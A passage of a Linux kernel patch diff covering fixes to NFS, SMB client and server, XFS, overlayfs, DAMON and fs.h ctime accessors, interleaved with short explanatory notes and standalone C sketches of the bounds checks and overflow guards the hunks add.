+@@ -5628,7 +5628,7 @@ static void nfs4_proc_write_setup(struct nfs_pgio_header *hdr,
+ 
+ 	msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_WRITE];
+ 	nfs4_init_sequence(&hdr->args.seq_args, &hdr->res.seq_res, 0, 0);
+-	nfs4_state_protect_write(server->nfs_client, clnt, msg, hdr);
++	nfs4_state_protect_write(hdr->ds_clp ? hdr->ds_clp : server->nfs_client, clnt, msg, hdr);
+ }
+ 
+ static void nfs4_proc_commit_rpc_prepare(struct rpc_task *task, struct nfs_commit_data *data)
+@@ -5669,7 +5669,8 @@ static void nfs4_proc_commit_setup(struct nfs_commit_data *data, struct rpc_mess
+ 	data->res.server = server;
+ 	msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_COMMIT];
+ 	nfs4_init_sequence(&data->args.seq_args, &data->res.seq_res, 1, 0);
+-	nfs4_state_protect(server->nfs_client, NFS_SP4_MACH_CRED_COMMIT, clnt, msg);
++	nfs4_state_protect(data->ds_clp ? data->ds_clp : server->nfs_client,
++			NFS_SP4_MACH_CRED_COMMIT, clnt, msg);
+ }
+ 
+ static int _nfs4_proc_commit(struct file *dst, struct nfs_commitargs *args,
+@@ -8939,6 +8940,7 @@ void nfs4_test_session_trunk(struct rpc_clnt *clnt, struct rpc_xprt *xprt,
+ 
+ 	sp4_how = (adata->clp->cl_sp4_flags == 0 ? SP4_NONE : SP4_MACH_CRED);
+ 
++try_again:
+ 	/* Test connection for session trunking. Async exchange_id call */
+ 	task = nfs4_run_exchange_id(adata->clp, adata->cred, sp4_how, xprt);
+ 	if (IS_ERR(task))
+@@ -8951,11 +8953,15 @@ void nfs4_test_session_trunk(struct rpc_clnt *clnt, struct rpc_xprt *xprt,
+ 
+ 	if (status == 0)
+ 		rpc_clnt_xprt_switch_add_xprt(clnt, xprt);
+-	else if (rpc_clnt_xprt_switch_has_addr(clnt,
++	else if (status != -NFS4ERR_DELAY && rpc_clnt_xprt_switch_has_addr(clnt,
+ 				(struct sockaddr *)&xprt->addr))
+ 		rpc_clnt_xprt_switch_remove_xprt(clnt, xprt);
+ 
+ 	rpc_put_task(task);
++	if (status == -NFS4ERR_DELAY) {
++		ssleep(1);
++		goto try_again;
++	}
+ }
+ EXPORT_SYMBOL_GPL(nfs4_test_session_trunk);
+ 
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 96714e105d7bf..faecdbfa01a29 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -2799,7 +2799,7 @@ static int client_opens_release(struct inode *inode, struct file *file)
+ 
+ 	/* XXX: alternatively, we could get/drop in seq start/stop */
+ 	drop_client(clp);
+-	return 0;
++	return seq_release(inode, file);
+ }
+ 
+ static const struct file_operations client_states_fops = {
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index 08d3a1f34ac6c..51eec4a8e82b2 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -2155,7 +2155,7 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent)
+ 		ovl_trusted_xattr_handlers;
+ 	sb->s_fs_info = ofs;
+ 	sb->s_flags |= SB_POSIXACL;
+-	sb->s_iflags |= SB_I_SKIP_SYNC | SB_I_IMA_UNVERIFIABLE_SIGNATURE;
++	sb->s_iflags |= SB_I_SKIP_SYNC;
+ 
+ 	err = -ENOMEM;
+ 	root_dentry = ovl_get_root(sb, upperpath.dentry, oe);
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 72f2b373221ed..4a4c04a3b1a0a 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -1814,7 +1814,6 @@ static const struct sysctl_alias sysctl_aliases[] = {
+ 	{"hung_task_panic",			"kernel.hung_task_panic" },
+ 	{"numa_zonelist_order",			"vm.numa_zonelist_order" },
+ 	{"softlockup_all_cpu_backtrace",	"kernel.softlockup_all_cpu_backtrace" },
+-	{"softlockup_panic",			"kernel.softlockup_panic" },
+ 	{ }
+ };
+ 
+@@ -1830,6 +1829,13 @@ static const char *sysctl_find_alias(char *param)
+ 	return NULL;
+ }
+ 
++bool sysctl_is_alias(char *param)
++{
++	const char *alias = sysctl_find_alias(param);
++
++	return alias != NULL;
++}
++
+ /* Set sysctl value passed on kernel command line. */
+ static int process_sysctl_arg(char *param, char *val,
+ 			       const char *unused, void *arg)
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index f26ddfcaa5e61..b0cf3869d3bf5 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -2403,6 +2403,20 @@ static int vfs_setup_quota_inode(struct inode *inode, int type)
+ 	if (sb_has_quota_loaded(sb, type))
+ 		return -EBUSY;
+ 
++	/*
++	 * Quota files should never be encrypted.  They should be thought of as
++	 * filesystem metadata, not user data.  New-style internal quota files
++	 * cannot be encrypted by users anyway, but old-style external quota
++	 * files could potentially be incorrectly created in an encrypted
++	 * directory, hence this explicit check.  Some reasons why encrypted
++	 * quota files don't work include: (1) some filesystems that support
++	 * encryption don't handle it in their quota_read and quota_write, and
++	 * (2) cleaning up encrypted quota files at unmount would need special
++	 * consideration, as quota files are cleaned up later than user files.
++	 */
++	if (IS_ENCRYPTED(inode))
++		return -EINVAL;
++
+ 	dqopt->files[type] = igrab(inode);
+ 	if (!dqopt->files[type])
+ 		return -EIO;
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index e41154ad96afc..ed396b186c5a4 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -380,6 +380,11 @@ skip_rdma:
+ 		seq_printf(m, "\n\n\tSessions: ");
+ 		i = 0;
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			spin_lock(&ses->ses_lock);
++			if (ses->ses_status == SES_EXITING) {
++				spin_unlock(&ses->ses_lock);
++				continue;
++			}
+ 			i++;
+ 			if ((ses->serverDomain == NULL) ||
+ 				(ses->serverOS == NULL) ||
+@@ -400,6 +405,7 @@ skip_rdma:
+ 				ses->ses_count, ses->serverOS, ses->serverNOS,
+ 				ses->capabilities, ses->ses_status);
+ 			}
++			spin_unlock(&ses->ses_lock);
+ 
+ 			seq_printf(m, "\n\tSecurity type: %s ",
+ 				get_security_type_str(server->ops->select_sectype(server, ses->sectype)));
+diff --git a/fs/smb/client/cifs_spnego.c b/fs/smb/client/cifs_spnego.c
+index 342717bf1dc28..1e6819daaaa7e 100644
+--- a/fs/smb/client/cifs_spnego.c
++++ b/fs/smb/client/cifs_spnego.c
+@@ -64,8 +64,8 @@ struct key_type cifs_spnego_key_type = {
+  * strlen(";sec=ntlmsspi") */
+ #define MAX_MECH_STR_LEN	13
+ 
+-/* strlen of "host=" */
+-#define HOST_KEY_LEN		5
++/* strlen of ";host=" */
++#define HOST_KEY_LEN		6
+ 
+ /* strlen of ";ip4=" or ";ip6=" */
+ #define IP_KEY_LEN		5
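
The spnego fix is an off-by-one in a length constant: the buffer accounting must cover ";host=" including the leading separator, so the length is 6, not the 5 of bare "host=". Constants like this can be pinned at compile time:

#include <assert.h>
#include <string.h>

#define HOST_KEY_LEN	6	/* strlen(";host=") */

/* sizeof a string literal counts the NUL, hence the -1. */
static_assert(sizeof(";host=") - 1 == HOST_KEY_LEN, "HOST_KEY_LEN mismatch");

int main(void)
{
	assert(strlen(";host=") == HOST_KEY_LEN);
	return 0;
}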
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 18d66497c42d1..33ea1440f4b06 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1186,6 +1186,7 @@ const char *cifs_get_link(struct dentry *dentry, struct inode *inode,
+ 
+ const struct inode_operations cifs_symlink_inode_ops = {
+ 	.get_link = cifs_get_link,
++	.setattr = cifs_setattr,
+ 	.permission = cifs_permission,
+ 	.listxattr = cifs_listxattr,
+ };
+diff --git a/fs/smb/client/cifspdu.h b/fs/smb/client/cifspdu.h
+index cc458b98441c7..c403816d0b6c1 100644
+--- a/fs/smb/client/cifspdu.h
++++ b/fs/smb/client/cifspdu.h
+@@ -2570,7 +2570,7 @@ typedef struct {
+ 
+ 
+ struct win_dev {
+-	unsigned char type[8]; /* IntxCHR or IntxBLK */
++	unsigned char type[8]; /* IntxCHR or IntxBLK or LnxFIFO */
+ 	__le64 major;
+ 	__le64 minor;
+ } __attribute__((packed));
+diff --git a/fs/smb/client/cifsproto.h b/fs/smb/client/cifsproto.h
+index a914b88ca51a1..f37e4da0fe405 100644
+--- a/fs/smb/client/cifsproto.h
++++ b/fs/smb/client/cifsproto.h
+@@ -79,7 +79,7 @@ extern char *cifs_compose_mount_options(const char *sb_mountdata,
+ 		const char *fullpath, const struct dfs_info3_param *ref,
+ 		char **devname);
+ extern void delete_mid(struct mid_q_entry *mid);
+-extern void release_mid(struct mid_q_entry *mid);
++void __release_mid(struct kref *refcount);
+ extern void cifs_wake_up_task(struct mid_q_entry *mid);
+ extern int cifs_handle_standard(struct TCP_Server_Info *server,
+ 				struct mid_q_entry *mid);
+@@ -694,4 +694,9 @@ struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+ void cifs_put_tcon_super(struct super_block *sb);
+ int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+ 
++static inline void release_mid(struct mid_q_entry *mid)
++{
++	kref_put(&mid->refcount, __release_mid);
++}
++
+ #endif			/* _CIFSPROTO_H */
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index acb8951eb7576..6ca1e00b3f76a 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -205,13 +205,14 @@ cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
+ 	/* If server is a channel, select the primary channel */
+ 	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+ 
+-	spin_lock(&pserver->srv_lock);
++	/* if we need to signal just this channel */
+ 	if (!all_channels) {
+-		pserver->tcpStatus = CifsNeedReconnect;
+-		spin_unlock(&pserver->srv_lock);
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsExiting)
++			server->tcpStatus = CifsNeedReconnect;
++		spin_unlock(&server->srv_lock);
+ 		return;
+ 	}
+-	spin_unlock(&pserver->srv_lock);
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+@@ -4204,8 +4205,12 @@ cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+ 	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+ 	spin_unlock(&ses->chan_lock);
+ 
+-	if (!is_binding)
++	if (!is_binding) {
+ 		ses->ses_status = SES_IN_SETUP;
++
++		/* force iface_list refresh */
++		ses->iface_last_update = 0;
++	}
+ 	spin_unlock(&ses->ses_lock);
+ 
+ 	/* update ses ip_addr only for primary chan */
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 9531ea2430899..05516309ec3ab 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -567,6 +567,10 @@ cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
+ 			cifs_dbg(FYI, "Symlink\n");
+ 			fattr->cf_mode |= S_IFLNK;
+ 			fattr->cf_dtype = DT_LNK;
++		} else if (memcmp("LnxFIFO", pbuf, 8) == 0) {
++			cifs_dbg(FYI, "FIFO\n");
++			fattr->cf_mode |= S_IFIFO;
++			fattr->cf_dtype = DT_FIFO;
+ 		} else {
+ 			fattr->cf_mode |= S_IFREG; /* file? */
+ 			fattr->cf_dtype = DT_REG;
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+index 1e3e22979604f..f0d164873500b 100644
+--- a/fs/smb/client/sess.c
++++ b/fs/smb/client/sess.c
+@@ -186,7 +186,6 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 	}
+ 
+ 	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+-		ses->chan_max = 1;
+ 		spin_unlock(&ses->chan_lock);
+ 		cifs_server_dbg(VFS, "no multichannel support\n");
+ 		return 0;
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index 572293c18e16f..eaa5bd148810a 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -787,7 +787,7 @@ __smb2_handle_cancelled_cmd(struct cifs_tcon *tcon, __u16 cmd, __u64 mid,
+ {
+ 	struct close_cancelled_open *cancelled;
+ 
+-	cancelled = kzalloc(sizeof(*cancelled), GFP_ATOMIC);
++	cancelled = kzalloc(sizeof(*cancelled), GFP_KERNEL);
+ 	if (!cancelled)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index efff7137412b4..2c1898803279a 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -5215,7 +5215,7 @@ smb2_make_node(unsigned int xid, struct inode *inode,
+ 	 * over SMB2/SMB3 and Samba will do this with SMB3.1.1 POSIX Extensions
+ 	 */
+ 
+-	if (!S_ISCHR(mode) && !S_ISBLK(mode))
++	if (!S_ISCHR(mode) && !S_ISBLK(mode) && !S_ISFIFO(mode))
+ 		return rc;
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+@@ -5263,6 +5263,12 @@ smb2_make_node(unsigned int xid, struct inode *inode,
+ 		pdev->minor = cpu_to_le64(MINOR(dev));
+ 		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+ 							&bytes_written, iov, 1);
++	} else if (S_ISFIFO(mode)) {
++		memcpy(pdev->type, "LnxFIFO", 8);
++		pdev->major = 0;
++		pdev->minor = 0;
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
+ 	}
+ 	tcon->ses->server->ops->close(xid, tcon, &fid);
+ 	d_drop(dentry);
+diff --git a/fs/smb/client/smb2transport.c b/fs/smb/client/smb2transport.c
+index 22954a9c7a6c7..69dbd08fd4419 100644
+--- a/fs/smb/client/smb2transport.c
++++ b/fs/smb/client/smb2transport.c
+@@ -451,6 +451,8 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 				  ptriplet->encryption.context,
+ 				  ses->smb3encryptionkey,
+ 				  SMB3_ENC_DEC_KEY_SIZE);
++		if (rc)
++			return rc;
+ 		rc = generate_key(ses, ptriplet->decryption.label,
+ 				  ptriplet->decryption.context,
+ 				  ses->smb3decryptionkey,
+@@ -459,9 +461,6 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 			return rc;
+ 	}
+ 
+-	if (rc)
+-		return rc;
+-
+ #ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
+ 	cifs_dbg(VFS, "%s: dumping generated AES session keys\n", __func__);
+ 	/*
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index 87aea456ee903..8a1dd8407a3a7 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -76,7 +76,7 @@ alloc_mid(const struct smb_hdr *smb_buffer, struct TCP_Server_Info *server)
+ 	return temp;
+ }
+ 
+-static void __release_mid(struct kref *refcount)
++void __release_mid(struct kref *refcount)
+ {
+ 	struct mid_q_entry *midEntry =
+ 			container_of(refcount, struct mid_q_entry, refcount);
+@@ -156,15 +156,6 @@ static void __release_mid(struct kref *refcount)
+ 	mempool_free(midEntry, cifs_mid_poolp);
+ }
+ 
+-void release_mid(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->server;
+-
+-	spin_lock(&server->mid_lock);
+-	kref_put(&mid->refcount, __release_mid);
+-	spin_unlock(&server->mid_lock);
+-}
+-
+ void
+ delete_mid(struct mid_q_entry *mid)
+ {
+diff --git a/fs/smb/client/xattr.c b/fs/smb/client/xattr.c
+index 998fa51f9b684..786b4f6e1263a 100644
+--- a/fs/smb/client/xattr.c
++++ b/fs/smb/client/xattr.c
+@@ -150,10 +150,13 @@ static int cifs_xattr_set(const struct xattr_handler *handler,
+ 		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+ 			goto out;
+ 
+-		if (pTcon->ses->server->ops->set_EA)
++		if (pTcon->ses->server->ops->set_EA) {
+ 			rc = pTcon->ses->server->ops->set_EA(xid, pTcon,
+ 				full_path, name, value, (__u16)size,
+ 				cifs_sb->local_nls, cifs_sb);
++			if (rc == 0)
++				inode_set_ctime_current(inode);
++		}
+ 		break;
+ 
+ 	case XATTR_CIFS_ACL:
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index a4421d9458d90..adc41b57b84c6 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -372,11 +372,22 @@ static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
+ 	return 0;
+ }
+ 
++/**
++ * set_smb1_rsp_status() - set error type in smb response header
++ * @work:	smb work containing smb response header
++ * @err:	error code to set in response
++ */
++static void set_smb1_rsp_status(struct ksmbd_work *work, __le32 err)
++{
++	work->send_no_response = 1;
++}
++
+ static struct smb_version_ops smb1_server_ops = {
+ 	.get_cmd_val = get_smb1_cmd_val,
+ 	.init_rsp_hdr = init_smb1_rsp_hdr,
+ 	.allocate_rsp_buf = smb1_allocate_rsp_buf,
+ 	.check_user_session = smb1_check_user_session,
++	.set_rsp_status = set_smb1_rsp_status,
+ };
+ 
+ static int smb1_negotiate(struct ksmbd_work *work)
+diff --git a/fs/smb/server/smbacl.c b/fs/smb/server/smbacl.c
+index b05ff9b146b55..c24df86eb112b 100644
+--- a/fs/smb/server/smbacl.c
++++ b/fs/smb/server/smbacl.c
+@@ -1107,6 +1107,7 @@ pass:
+ 		struct smb_acl *pdacl;
+ 		struct smb_sid *powner_sid = NULL, *pgroup_sid = NULL;
+ 		int powner_sid_size = 0, pgroup_sid_size = 0, pntsd_size;
++		int pntsd_alloc_size;
+ 
+ 		if (parent_pntsd->osidoffset) {
+ 			powner_sid = (struct smb_sid *)((char *)parent_pntsd +
+@@ -1119,9 +1120,10 @@ pass:
+ 			pgroup_sid_size = 1 + 1 + 6 + (pgroup_sid->num_subauth * 4);
+ 		}
+ 
+-		pntsd = kzalloc(sizeof(struct smb_ntsd) + powner_sid_size +
+-				pgroup_sid_size + sizeof(struct smb_acl) +
+-				nt_size, GFP_KERNEL);
++		pntsd_alloc_size = sizeof(struct smb_ntsd) + powner_sid_size +
++			pgroup_sid_size + sizeof(struct smb_acl) + nt_size;
++
++		pntsd = kzalloc(pntsd_alloc_size, GFP_KERNEL);
+ 		if (!pntsd) {
+ 			rc = -ENOMEM;
+ 			goto free_aces_base;
+@@ -1136,6 +1138,27 @@ pass:
+ 		pntsd->gsidoffset = parent_pntsd->gsidoffset;
+ 		pntsd->dacloffset = parent_pntsd->dacloffset;
+ 
++		if ((u64)le32_to_cpu(pntsd->osidoffset) + powner_sid_size >
++		    pntsd_alloc_size) {
++			rc = -EINVAL;
++			kfree(pntsd);
++			goto free_aces_base;
++		}
++
++		if ((u64)le32_to_cpu(pntsd->gsidoffset) + pgroup_sid_size >
++		    pntsd_alloc_size) {
++			rc = -EINVAL;
++			kfree(pntsd);
++			goto free_aces_base;
++		}
++
++		if ((u64)le32_to_cpu(pntsd->dacloffset) + sizeof(struct smb_acl) + nt_size >
++		    pntsd_alloc_size) {
++			rc = -EINVAL;
++			kfree(pntsd);
++			goto free_aces_base;
++		}
++
+ 		if (pntsd->osidoffset) {
+ 			struct smb_sid *owner_sid = (struct smb_sid *)((char *)pntsd +
+ 					le32_to_cpu(pntsd->osidoffset));
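
The smbacl.c hunk validates offsets parsed from an untrusted security descriptor against the allocation size before dereferencing them, widening to 64 bits so offset-plus-size cannot wrap. A standalone sketch of the same check (the struct is a stand-in, not the real SMB layout):

#include <stdint.h>
#include <stdio.h>

struct desc {
	uint32_t osidoffset;	/* untrusted, from the wire */
	uint32_t gsidoffset;
};

static int offsets_ok(const struct desc *d, size_t owner_size,
		      size_t group_size, size_t alloc_size)
{
	/* Widen to u64 so offset + size cannot wrap around. */
	if ((uint64_t)d->osidoffset + owner_size > alloc_size)
		return 0;
	if ((uint64_t)d->gsidoffset + group_size > alloc_size)
		return 0;
	return 1;
}

int main(void)
{
	struct desc good = { .osidoffset = 16, .gsidoffset = 48 };
	struct desc evil = { .osidoffset = UINT32_MAX - 4, .gsidoffset = 48 };

	printf("good: %d\n", offsets_ok(&good, 32, 32, 128));	/* 1 */
	printf("evil: %d\n", offsets_ok(&evil, 32, 32, 128));	/* 0 */
	return 0;
}
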
+diff --git a/fs/xfs/xfs_inode_item_recover.c b/fs/xfs/xfs_inode_item_recover.c
+index 0e5dba2343ea1..e6609067ef261 100644
+--- a/fs/xfs/xfs_inode_item_recover.c
++++ b/fs/xfs/xfs_inode_item_recover.c
+@@ -369,24 +369,26 @@ xlog_recover_inode_commit_pass2(
+ 	 * superblock flag to determine whether we need to look at di_flushiter
+ 	 * to skip replay when the on disk inode is newer than the log one
+ 	 */
+-	if (!xfs_has_v3inodes(mp) &&
+-	    ldip->di_flushiter < be16_to_cpu(dip->di_flushiter)) {
+-		/*
+-		 * Deal with the wrap case, DI_MAX_FLUSH is less
+-		 * than smaller numbers
+-		 */
+-		if (be16_to_cpu(dip->di_flushiter) == DI_MAX_FLUSH &&
+-		    ldip->di_flushiter < (DI_MAX_FLUSH >> 1)) {
+-			/* do nothing */
+-		} else {
+-			trace_xfs_log_recover_inode_skip(log, in_f);
+-			error = 0;
+-			goto out_release;
++	if (!xfs_has_v3inodes(mp)) {
++		if (ldip->di_flushiter < be16_to_cpu(dip->di_flushiter)) {
++			/*
++			 * Deal with the wrap case, DI_MAX_FLUSH is less
++			 * than smaller numbers
++			 */
++			if (be16_to_cpu(dip->di_flushiter) == DI_MAX_FLUSH &&
++			    ldip->di_flushiter < (DI_MAX_FLUSH >> 1)) {
++				/* do nothing */
++			} else {
++				trace_xfs_log_recover_inode_skip(log, in_f);
++				error = 0;
++				goto out_release;
++			}
+ 		}
++
++		/* Take the opportunity to reset the flush iteration count */
++		ldip->di_flushiter = 0;
+ 	}
+ 
+-	/* Take the opportunity to reset the flush iteration count */
+-	ldip->di_flushiter = 0;
+ 
+ 	if (unlikely(S_ISREG(ldip->di_mode))) {
+ 		if ((ldip->di_format != XFS_DINODE_FMT_EXTENTS) &&
+diff --git a/include/linux/damon.h b/include/linux/damon.h
+index 620ada094c3b2..b13be7ae2275e 100644
+--- a/include/linux/damon.h
++++ b/include/linux/damon.h
+@@ -559,6 +559,13 @@ static inline bool damon_target_has_pid(const struct damon_ctx *ctx)
+ 	return ctx->ops.id == DAMON_OPS_VADDR || ctx->ops.id == DAMON_OPS_FVADDR;
+ }
+ 
++static inline unsigned int damon_max_nr_accesses(const struct damon_attrs *attrs)
++{
++	/* {aggr,sample}_interval are unsigned long, hence could overflow */
++	return min(attrs->aggr_interval / attrs->sample_interval,
++			(unsigned long)UINT_MAX);
++}
++
+ 
+ int damon_start(struct damon_ctx **ctxs, int nr_ctxs, bool exclusive);
+ int damon_stop(struct damon_ctx **ctxs, int nr_ctxs);
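
The damon_max_nr_accesses() helper above clamps the interval quotient before narrowing it from unsigned long to unsigned int, as the comment in the hunk notes. A userspace sketch of the same clamp (interval names are ours; DAMON's are in microseconds):

#include <limits.h>
#include <stdio.h>

static unsigned int max_nr_accesses(unsigned long aggr_us,
				    unsigned long sample_us)
{
	unsigned long q = aggr_us / sample_us;

	return q < UINT_MAX ? (unsigned int)q : UINT_MAX;	/* clamp */
}

int main(void)
{
	/* Typical: 100ms aggregation / 5ms sampling -> 20. */
	printf("%u\n", max_nr_accesses(100000, 5000));
	/* A pathological quotient would be truncated without the clamp. */
	printf("%u\n", max_nr_accesses(ULONG_MAX, 1));
	return 0;
}
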
+diff --git a/include/linux/ethtool.h b/include/linux/ethtool.h
+index 99dc7bfbcd3c3..7dacc109eb251 100644
+--- a/include/linux/ethtool.h
++++ b/include/linux/ethtool.h
+@@ -836,10 +836,10 @@ int ethtool_get_phc_vclocks(struct net_device *dev, int **vclock_index);
+ 
+ /**
+  * ethtool_sprintf - Write formatted string to ethtool string data
+- * @data: Pointer to start of string to update
++ * @data: Pointer to a pointer to the start of string to update
+  * @fmt: Format of string to write
+  *
+- * Write formatted string to data. Update data to point at start of
++ * Write formatted string to *data. Update *data to point at start of
+  * next string.
+  */
+ extern __printf(2, 3) void ethtool_sprintf(u8 **data, const char *fmt, ...);
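
The ethtool.h comment fix above clarifies the double-pointer contract: the helper writes at *data and then advances *data past what it wrote, so successive calls fill a packed string table. A sketch of that cursor-advancing pattern (STR_LEN stands in for the fixed ETH_GSTRING_LEN stride, which is an assumption of this sketch):

#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define STR_LEN 32	/* stand-in for ETH_GSTRING_LEN */

static void strings_printf(char **data, const char *fmt, ...)
{
	va_list args;

	va_start(args, fmt);
	vsnprintf(*data, STR_LEN, fmt, args);
	va_end(args);
	*data += STR_LEN;	/* advance the caller's cursor to the next slot */
}

int main(void)
{
	char table[4 * STR_LEN] = { 0 };
	char *p = table;
	int i;

	for (i = 0; i < 4; i++)
		strings_printf(&p, "rx_queue_%d_packets", i);
	for (i = 0; i < 4; i++)
		printf("%s\n", table + i * STR_LEN);
	return 0;
}
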
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index dc745317e1bdb..b6af6abc7a77f 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -1812,7 +1812,50 @@ static inline bool fsuidgid_has_mapping(struct super_block *sb,
+ 	       kgid_has_mapping(fs_userns, kgid);
+ }
+ 
+-extern struct timespec64 current_time(struct inode *inode);
++struct timespec64 current_time(struct inode *inode);
++struct timespec64 inode_set_ctime_current(struct inode *inode);
++
++/**
++ * inode_get_ctime - fetch the current ctime from the inode
++ * @inode: inode from which to fetch ctime
++ *
++ * Grab the current ctime from the inode and return it.
++ */
++static inline struct timespec64 inode_get_ctime(const struct inode *inode)
++{
++	return inode->i_ctime;
++}
++
++/**
++ * inode_set_ctime_to_ts - set the ctime in the inode
++ * @inode: inode in which to set the ctime
++ * @ts: value to set in the ctime field
++ *
++ * Set the ctime in @inode to @ts
++ */
++static inline struct timespec64 inode_set_ctime_to_ts(struct inode *inode,
++						      struct timespec64 ts)
++{
++	inode->i_ctime = ts;
++	return ts;
++}
++
++/**
++ * inode_set_ctime - set the ctime in the inode
++ * @inode: inode in which to set the ctime
++ * @sec: tv_sec value to set
++ * @nsec: tv_nsec value to set
++ *
++ * Set the ctime in @inode to { @sec, @nsec }
++ */
++static inline struct timespec64 inode_set_ctime(struct inode *inode,
++						time64_t sec, long nsec)
++{
++	struct timespec64 ts = { .tv_sec  = sec,
++				 .tv_nsec = nsec };
++
++	return inode_set_ctime_to_ts(inode, ts);
++}
+ 
+ /*
+  * Snapshotting support.
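
The fs.h hunk introduces ctime accessors so filesystems stop touching i_ctime directly, which lets the underlying representation change later without a tree-wide sweep. A simplified sketch of the accessor shape, with stand-in types rather than the kernel's:

#include <stdio.h>
#include <time.h>

struct myinode {
	struct timespec ctime;	/* private; use the accessors below */
};

static struct timespec inode_get_ctime(const struct myinode *inode)
{
	return inode->ctime;
}

static struct timespec inode_set_ctime(struct myinode *inode,
				       time_t sec, long nsec)
{
	struct timespec ts = { .tv_sec = sec, .tv_nsec = nsec };

	inode->ctime = ts;
	return ts;
}

int main(void)
{
	struct myinode inode;
	struct timespec ts;

	inode_set_ctime(&inode, 1700000000, 500);
	ts = inode_get_ctime(&inode);
	printf("ctime=%lld.%09ld\n", (long long)ts.tv_sec, ts.tv_nsec);
	return 0;
}
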
+diff --git a/include/linux/generic-radix-tree.h b/include/linux/generic-radix-tree.h
+index 107613f7d7920..f6cd0f909d9fb 100644
+--- a/include/linux/generic-radix-tree.h
++++ b/include/linux/generic-radix-tree.h
+@@ -38,6 +38,7 @@
+ 
+ #include <asm/page.h>
+ #include <linux/bug.h>
++#include <linux/limits.h>
+ #include <linux/log2.h>
+ #include <linux/math.h>
+ #include <linux/types.h>
+@@ -184,6 +185,12 @@ void *__genradix_iter_peek(struct genradix_iter *, struct __genradix *, size_t);
+ static inline void __genradix_iter_advance(struct genradix_iter *iter,
+ 					   size_t obj_size)
+ {
++	if (iter->offset + obj_size < iter->offset) {
++		iter->offset	= SIZE_MAX;
++		iter->pos	= SIZE_MAX;
++		return;
++	}
++
+ 	iter->offset += obj_size;
+ 
+ 	if (!is_power_of_2(obj_size) &&
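
The generic-radix-tree.h guard above makes the iterator saturate instead of wrapping when advancing the offset would overflow; the peek path (patched further below in lib/generic-radix-tree.c) then treats the saturated value as end-of-tree. A sketch of the saturating advance:

#include <stdint.h>
#include <stdio.h>

struct iter { size_t offset; };

static void iter_advance(struct iter *it, size_t obj_size)
{
	if (it->offset + obj_size < it->offset) {	/* would wrap */
		it->offset = SIZE_MAX;			/* saturate */
		return;
	}
	it->offset += obj_size;
}

int main(void)
{
	struct iter it = { .offset = SIZE_MAX - 8 };

	iter_advance(&it, 16);
	printf("saturated: %d\n", it.offset == SIZE_MAX);	/* 1 */
	return 0;
}
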
+diff --git a/include/linux/lsm_hook_defs.h b/include/linux/lsm_hook_defs.h
+index 4a97a6db9bcec..02b19c508b78f 100644
+--- a/include/linux/lsm_hook_defs.h
++++ b/include/linux/lsm_hook_defs.h
+@@ -48,7 +48,7 @@ LSM_HOOK(int, 0, quota_on, struct dentry *dentry)
